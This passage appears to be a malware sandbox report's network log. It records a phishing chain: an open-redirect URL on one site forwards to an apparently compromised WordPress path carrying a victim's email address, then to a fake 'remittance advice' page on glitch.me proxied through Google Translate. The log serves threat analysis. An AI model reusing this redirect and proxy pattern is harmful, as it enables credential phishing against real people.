    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50540
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50421
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50420
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50423
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50422
    Source: unknownNetwork traffic detected: HTTP traffic on port 50373 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
    Source: unknownNetwork traffic detected: HTTP traffic on port 50361 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
    Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50551
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50434
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50568
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50567
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
    Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50569
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
    Source: unknownNetwork traffic detected: HTTP traffic on port 50421 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50564
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
    Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50566
    Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50565
    Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
    Source: unknownNetwork traffic detected: HTTP traffic on port 50319 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50366 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
    Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
    Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
    Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
    Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50275 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50297 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 50583 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
    Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50373
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50494
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50372
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50375
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 50330 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50374
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50495
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50377
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50378
    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50380
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50382
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50479 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
    Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: global trafficHTTP traffic detected: GET /?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com HTTP/1.1Host: www.rxjapan.jpConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-includes/Auth/sf_rand_string_lowercase(6)///dan@glassvice.com HTTP/1.1Host: moneycointv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp HTTP/1.1Host: remittanceadvice--details-glitch-me.translate.googConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://moneycointv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: moneycointv.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://moneycointv.com/wp-includes/Auth/sf_rand_string_lowercase(6)///dan@glassvice.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/09/favicon-150x150.png HTTP/1.1Host: www.moneycointv.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://moneycointv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: https://remittanceadvice--details-glitch-me.translate.googsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: https://remittanceadvice--details-glitch-me.translate.googsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: https://remittanceadvice--details-glitch-me.translate.googsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=gtElInit&hl=en&client=wt HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/09/favicon-150x150.png HTTP/1.1Host: www.moneycointv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /websitetranslationui?parent=https%3A%2F%2Fremittanceadvice--details-glitch-me.translate.goog&pfu=https%3A%2F%2Fremittanceadvice--details-glitch-me.translate.goog%2Fremittance.html%3F_x_tr_sl%3Dauto%26_x_tr_tl%3Den%26_x_tr_hl%3Den%26_x_tr_pto%3Dwapp&u=https%3A%2F%2Fremittanceadvice-details.glitch.me%2Fremittance.html&sl=auto&tl=en&opu=https%3A%2F%2Ftranslate.google.com%2Fwebsite%3Fsl%3Dauto%26tl%3Den%26hl%3Den%26client%3Dwebapp%26u%3Dhttps%3A%2F%2Fremittanceadvice-details.glitch.me%2Fremittance.html%26anno%3D2&client=webapp&hl=en&lang=en&uip=true HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gen204?nca=te_li&client=wt_lib&logld=vTE_20230319 HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gen204?sl=auto&tl=en&textlen=20&ttt=294&ttl=308&sr=1&nca=te_time&client=wt_lib&logld=vTE_20230319 HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remittanceadvice--details-glitch-me.translate.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: remittanceadvice--details-glitch-me.translate.googConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wappAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.yHsE3XoyXLE.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8LDClD0V3IE-5SJcudVO91TD73Qw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-full-version-list: "Chromium";v="104.0.5112.81", " Not A;Brand";v="99.0.0.0", "Google Chrome";v="104.0.5112.81"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "104.0.5112.81"sec-ch-ua-platform-version: "6.0.0"sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-model: sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiTocsBCPyqzAEIvLzMAQj1vMwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEIncnMAQjjy8wBSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://translate.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: 